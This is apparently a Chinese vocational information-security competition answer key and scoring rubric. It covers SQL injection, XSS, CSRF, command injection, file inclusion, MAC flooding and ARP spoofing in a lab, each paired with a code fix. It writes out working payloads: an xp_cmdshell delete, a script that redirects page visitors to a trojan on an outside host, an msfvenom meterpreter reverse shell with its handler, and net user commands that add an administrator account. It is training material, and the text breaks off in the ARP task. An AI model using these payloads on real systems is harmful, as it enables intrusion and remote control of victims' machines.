1、高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准任务1:SQL注入攻防(55分)1.Web访问DCST中的WebServ2003服务器,进入login.php页面,分析该页面源程序,找到提交的变量名,并截图;(5分)找到源程序:(2分)页面标题:Login Page找到提交的变量名(3分)提供以下变量:name=usernmname=passwd2.对该任务题目1页面注入点进行SQL注入渗透测试,使该Web站点可通过任意用户名登录,并将测试过程截图;(5分)构造注入语句:username:任意用户名password:含:or X=X(X为任意值)(3分)同时包含截图:1、通过任意用
2、户名登录(截图)2、登录成功页面(截图)(2分)3.进入DCST中的WebServ2003服务器的C:AppServwww目录,找到loginAuth.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御SQL注入,并将修改后的PHP源程序截图;(10分)(10分)包含语句:1、select password from users where username=$username2、if($obj-password=$password)4.再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行SQL注入渗透测试无效,并
3、将验证过程截图;(5分)同时包含截图:1、通过任意用户名登录(截图)2、登陆后,页面出现用户名不存在提示;(截图)(5分)5.Web继续访问DCST中的WebServ2003服务器,/-Employee Information Query,分析该页面源程序,找到提交的变量名,并截图;(5分)找到源程序:(2分)找到的源程序含有页面标题:Query找到提交的变量名(3分)name=usernm6.对该任务题目5页面注入点进行渗透测试,根据输入“%”以及“_”的返回结果确定是注入点,并将测试过程截图;(5分)(2分)输入“%”,返回所有用户信息(截图)输入“_”,返回所有用户信息(截图)(3分)7
4、.通过对该任务题目5页面注入点进行SQL注入渗透测试,删除DCST中的WebServ2003服务器的C:目录下的1.txt文档,并将注入代码及测试过程截图;(5分)构造注入语句:exec master.dbo.xp_cmdshell del c:1.txt-(5分)8.进入DCST中的WebServ2003服务器的C:AppServwww目录,找到QueryCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御SQL注入渗透测试,并将修改后的PHP源程序截图;(10分)截图:在服务器场景QueryCtrl.php源程序语句:$keyWord=$_REQUESTuse
5、rnm之后加入:(10分)9.再次对该任务题目5页面注入点进行渗透测试,验证此次利用注入点对该WebServer进行SQL注入渗透测试无效,并将验证过程截图。(5分)通过:exec master.dbo.xp_cmdshell del c:1.txt再次进行SQL注入截图;系统出现错误提示:Bad KeyWord!(截图)(5分)任务2:XSS和CSRF攻防(65分)1.Web访问DCST中的WebServ2003服务器,/- Employee Message Board,分析该页面源程序,找到提交的变量名,并截图;(5分)找到源程序:(2分)含有页面标题:Message Board找到提交的
6、变量名:(3分)name=MessageUsernamename=message2.对该任务题目1页面注入点进行XSS渗透测试,并进入/- Employee Message Board-Display Message页面,根据该页面的显示,确定是注入点,并将测试过程截图;(5分)构造注入代码:(2分)while(1)alert(Hacker!);测试注入成功:(3分)弹出alert(Hacker!)括号中的消息;3.对该任务题目1页面注入点进行渗透测试,使/- Employee Message Board-Display Message页面的访问者执行网站(http:/hacker.org/)
7、中的木马程序:http:/hacker.org/TrojanHorse.exe,并将注入代码及测试过程截图;(5分)构造注入代码:(2分) location.href=http:/hacker.org/TrojanHorse.exe; 测试过程:(3分)名称:trojanhorse.exe发送者:hacker.org4.通过IIS搭建网站(http:/hacker.org/),并通过Kali生成木马程序TrojanHorse.exe,将该程序复制到网站(http:/hacker.org/)的WWW根目录下,并将搭建该网站结果截图;(5分)搭建IIS(1分)Internet信息服务:网站目录下存
8、放:trojanhorse.exe搭建DNS(1分)正向查找区域:主机(截图)Zone:Org主机:hackerMetasploit Framework:TrojanHorse.exe生成 (3分)rootbt:#Ifconfig(截图)显示Kali IP地址:X.X.X.X截图包含:rootbt:#msfvenom p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=80 f exe o trojanhorse.exe5.当/- Employee Message Board-Display Message页面的访问者执行网站(http:
9、/hacker.org/)中的木马程序TrojanHorse.exe以后,访问者主机需要被Kali主机远程控制,打开访问者主机的CMD.exe命令行窗口,并将该操作过程截图;(5分)Metasploit Framework:Hacker Reverse Tcp连接客户端 (2分)rootbt:#msfconsolemsf use exploit/multi/handler msf exploit(handler) set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD = windows/meterpreter/reverse_tcp msf e
10、xploit(handler) set LHOST X.X.X.X LHOST = X.X.X.X msf exploit(handler) set LPORT 80 LPORT = 80 msf exploit(handler) exploit * Started reverse handler on X.X.X.X:80 * Starting the payload handler. (截图中包含黄色部分)访问者主机需要被Kali主机远程控制(3分)Kali MSF提示(截图)包含如下信息Kali IP:X.X.X.X访问者主机IP:Y.Y.Y.Y* Sending stage ( byt
11、es) to Y.Y.Y.Y * Meterpreter session 1 opened (X.X.X.X:Port1 - Y.Y.Y.Y:Port2) at meterpreter Kali截图包含打开访问者主机的CMD.exe命令行窗口;6.进入DCST中的WebServ2003服务器的C:AppServwww目录,找到insert.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御XSS渗透测试,并将修改后的PHP源程序截图;(10分)(10分)在服务器场景原insert.php程序语句$info=$_REQUESTmessage后加入:绿色部分,通过替换函数,通
12、过其它字符(,(),等字符)替换字符“”均可得分;$info=str_replace(“”,”)”,$info);或$info=str_replace(“”,” ”,$info);或$info=str_replace(“”,” ”,$info);7.再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行XSS渗透测试无效,并将验证过程截图;(5分)SQL Server企业管理器中,Message表中info字段注入语句符号“”被替换为上一题替换后的字符;同时Communication Message页面显示Content:注入语句符号“”
13、被替换为上一题替换后的字符;(5分)8.Web访问DCST中的WebServ2003服务器,/- Shopping Hall,分析该页面源程序,找到提交的变量名,并截图;(5分)找到源程序:(2分)页面标题为:Shopping Hall找到提交的变量名:(3分)goods=keyboard&quantity=1goods=mouse&quantity=1goods=monitor&quantity=1goods=cpu&quantity=1goods=memory&quantity=1goods=dvdrom&quantity=19.对该任务题目1页面注入点进行渗透测试,使/- Employe
14、e Message Board-Display Message页面的访问者向页面ShoppingProcess.php提交参数goods=cpu&quantity=999999,查看/-PurchasedGoods.php页面,并将注入代码及测试过程截图;(5分)构造注入代码:(2分) document.location=http:/X.X.X.X/ShoppingProcess.php?goods=cpu&quantity=999999; WebServer IP:X.X.X.X测试过程:(3分)截图:Goods:CPU-数值大于或等于99999910.进入DCST中的WebServ2003
15、服务器的C:AppServwww目录,找到DisplayMessage.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御CSRF渗透测试,并将修改后的源程序截图;(10分)截图:服务器场景DisplayMessage.php程序语句:echo “Content:”.”$obj-info”.”替换为:echo “Content:”.strip_tags(”$obj-info”).”(10分)11.再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行CSRF渗透测试无效,并将验证过程截图;(5分)(5分)得分点:直接
16、显示代码信息,而不是将代码执行;(截图)SQL Server企业管理器中,Message表中info字段注入语句含有标记;同时Communication Message页面显示Content:注入语句不含有标记;任务3:命令注入与文件包含攻防(50分)1.Web访问DCST中的WebServ2003服务器,/- Display Directory,分析该页面源程序,找到提交的变量名,并截图;(5分)找到源程序:(2分)页面标题:Display C:s Directory找到提交的变量名:(3分)name=directory2.对该任务题目1页面注入点进行渗透测试,使页面DisplayDirec
17、toryCtrl.php回显C:Windows目录内容的同时,对WebServer添加账号“Hacker”,将该账号加入管理员组,并将注入代码及测试过程截图;(5分)注入语句:(2分)WINDOWS | net user Hacker Pssword /addWINDOWS | net localgroup administrators Hacker /add测试成功:(3分)截图:含有:命令成功完成。3.进入DCST中的WebServ2003服务器的C:AppServwww目录,找到DisplayDirectoryCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以
18、抵御命令注入渗透测试,并将修改后的源程序截图;(10分)(10分)包含语句:$str=|if(strstr($directory,$str)=false)4.再次对该任务题目1页面注入点进行渗透测试,验证此次利用注入点对该DCST中的WebServ2003服务器进行命令注入渗透测试无效,并将验证过程截图;(5分)截图1:利用注入点对该DCST中的WebServ2003服务器进行命令注入渗透测试;含有本任务第2题的命令注入语句;WINDOWS | net user Hacker Pssword /addWINDOWS | net localgroup administrators Hacker
19、/add截图2:页面出现非法输入提示;含有本任务题目3修改后代码中的错误提示信息;本案例提示信息为:illegal input!(5分)5.Web访问DCST中的WebServ2003服务器,/- Display Uploadeds File Content,分析该页面源程序,找到提交的变量名,并截图;(5分)找到源程序:(2分)页面标题:Display Uploads File Content找到提交的变量名:(3分)name=filename6.对该任务题目5页面注入点进行渗透测试,使页面DisplayFileCtrl.php回显DCST中的WebServ2003服务器访问日志文件:App
20、Serv/Apache2.2/logs/access.log的内容,并将注入代码及测试过程截图;(5分)构造注入代码:(2分).AppServApache2.2logsaccess.log回显DCST中的WebServ2003服务器访问日志文件:显示出AppServ/Apache2.2/logs/access.log的内容:(3分)Internet Explorer地址栏中须含有:DisplayFileCtrl.php?filename=7.进入DCST中的WebServ2003服务器的C:AppServwww目录,找到DisplayFileCtrl.php程序,使用EditPlus工具分析并
21、修改PHP源程序,使之可以抵御文件包含渗透测试,并将修改后的源程序截图;(10分)(10分)包含语句:$str=.if(strstr($directory,$str)=false)8.再次对该任务题目5页面注入点进行渗透测试,验证此次利用注入点对该DCST中的WebServ2003服务器进行文件包含渗透测试无效,并将验证过程截图。(5分)截图1:利用注入点对该DCST中的WebServ2003服务器进行命令注入渗透测试;输入框含有本任务题目6的注入代码:.AppServApache2.2logsaccess.log截图2:页面出现非法输入提示;含有本任务题目7修改后代码中的错误提示信息;本案例
22、提示信息为:illegal input!(5分)任务4:数据窃取防护:二层攻防(45分)1.将PC1、Kali所连接端口划入与WAF同一VLAN(VLAN10),并将PC1、Kali分配与DCST服务器相同网段IP地址,使PC1、Kali、DCST中的WebServ2003服务器能够在同一个网段(VLAN10)内相互Ping通。(2分)截图:PC1、Kali、DCST同在VLAN10;(#show vlan)VLAN10中包含的接口数=3;WebServer IP配置(与参数表中服务器场景的IP地址一致):PC1 IP地址配置(与参数表中PC1的IP地址一致):PC3 IP地址配置(与参数表中
23、PC3的IP地址一致):三个终端之间能够相互Ping通;在同一个窗口ping通除了本机外的2个IP地址;2.查看DCRS交换机VLAN10的MAC地址表容量信息,并将DCRS交换机配置相关参数、查看命令、查看结果截图。(3分)#show mac-address-table count vlan 10DCRS地址表空间中有可用的空间;当前地址表记录数少于地址表容量;Max entiresTotal:16384Current entiresTotal:该数值小于103.从Kali发起MAC Flooding渗透测试,使DCRS交换机的MAC地址表溢出,使其在MAC地址表溢出的条件下,无法学习到PC
24、1和DCST中的WebServ2003服务器的MAC地址表信息,查看DCRS交换机的MAC地址表信息,并将渗透测试过程截图。(5分)Kali#macof(2分)#show mac-address-table count vlan 10当前地址表记录数等于地址表容量;Max entiresTotal:16384Current entiresTotal:该数值=16384(3分)4.Kali打开wireshark,验证在DCRS交换机MAC地址表溢出的条件下,可以监听到PC1访问DCST中的WebServ2003服务器的HTTP流量,并将该验证过程截图。(5分)PC1通过Internet Expl
25、orer访问;(截图)地址栏包含:服务器场景IP(匹配参数表服务器场景IP)/Kali打开wireshark,监听到PC1通过Internet Explorer访问DCST服务器场景的HTTP流量;截图:Source:PC1的IP地址(与参数表一致)Destination:服务器场景的IP地址(与参数表一致)Protocol:HTTP(5分)5.在DCRS交换机Kali所连接端口配置Port Security特性,阻止Kali发起MAC Flooding渗透测试,验证此时DCRS交换机MAC地址表能够学习到PC1、DCST中的WebServ2003服务器的MAC地址,并将DCRS交换机相关配置
26、信息以及验证信息截图。(8分)配置截图包含:mac-address-learning cpu-control (2分)在VLAN10每个接口全部启用如下:Interface Ethernet1/0/Xswitchport port-security(2分)#clear mac-address-table dynamic(2分)#show mac-address-table count vlan 10DCRS地址表空间中有可用的空间;当前地址表记录数少于地址表容量;Max entiresTotal:16384Current entiresTotal:该数值小于10(2分)6.在DCRS交换机配置
27、Port Security特性的条件下,Kali再次打开wireshark,监听PC1访问DCST中的WebServ2003服务器流量,验证此时Kali无法监听到PC1访问DCST中的WebServ2003服务器的HTTP流量,并将验证过程截图。(7分)PC1通过Internet Explorer访问服务器场景;(截图)地址栏包含:服务器场景IP(匹配参数表服务器场景IP)/Kali打开wireshark,监听不到PC1通过Internet Explorer访问DCST的HTTP流量;(截图)Filter:http显示报文数:空任务5:数据窃取防护:ARP攻防(45分)1.在PC1访问DCST
28、中的WebServ2003服务器时,查看PC1和DCST中的WebServ2003服务器的ARP缓存信息,并将PC1和DCST中的WebServ2003服务器的ARP缓存信息截图。(5分)PC1、WebServ2003Ipconfig/all分别显示PC1、WebServ2003的IP和MAC;PC1的IP和MAC:服务器场景的IP和MAC:PC1通过Internet Explorer访问服务器场景;(截图)地址栏包含:服务器场景IP(匹配参数表服务器场景IP)/PC1:ARP表项内容为WebServ2003的IP-WebServ2003的真实的MAC;WebServ2003:ARP表项内容为
29、PC1的IP- PC1的真实的MAC;2.在Kali对PC1进行ARP Spoofing渗透测试,使PC1无法访问DCST中的WebServ2003服务器,PC1的ARP缓存为:DCST中的WebServ2003服务器IP-Kali的MAC地址,在PC1查看被Kali毒化后的ARP缓存信息,并将该信息截图。(5分)Kali:#arpspoof t PC1_IP WebServ2003_IP(过程截图)(2分)PC1:ARP表项内容为WebServ2003的IP-Kali的MAC;Kali MAC:ifconfig(截图)(3分)3.在Kali对PC1和DCST中的WebServ2003服务器进行ARP中间人渗透测试,使Kali能够使用w
copyright@ 2008-2023 冰点文库 网站版权所有
经营许可证编号:鄂ICP备19020893号-2